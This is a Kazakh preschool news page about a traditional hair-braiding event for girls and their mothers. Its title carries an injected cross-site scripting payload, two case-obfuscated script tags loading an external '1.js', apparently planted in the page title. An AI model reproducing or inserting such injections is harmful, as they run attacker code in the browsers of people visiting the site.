"Бұрымды қыздарымыз"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.02.2025

"Біртұтас тәрбие" бағдарламасын жүзеге асыру барысында мектепалды "Арай" тобында "Аналар мектебі" жоспары бойынша "Бұрымды қыздарымыз" атты іс-шара өткізілді. Бұл шараның мақсаты – қазақ қыздарының ұлттық тәрбиесін насихаттау, шаш өру дәстүрін үйрету және шашбаудың маңыздылығын түсіндіру болды.
Іс-шара барысында қыз балаларға шаш күтімі туралы мәлімет беріліп, шаш өрімінің түрлері көрсетілді. Аналар өз қыздарының шашын өріп, ұлттық дәстүрлер жайлы әңгімеледі. Сондай-ақ, шашбаудың қыз бала үшін сәндік әрі тәрбиелік мәні зор екені түсіндірілді.
Бұл іс-шара жас ұрпақтың қазақ халқының салт-дәстүрлеріне деген қызығушылығын арттырып, отбасы құндылықтарын нығайтуға ықпал етті.
Тәрбиешілер: Орымбаева Я.Т
                         Жунусова А.Ж

 

Просмотров: 329


Пікір қосу



Деректерді қолтаңбаға қосу
Текст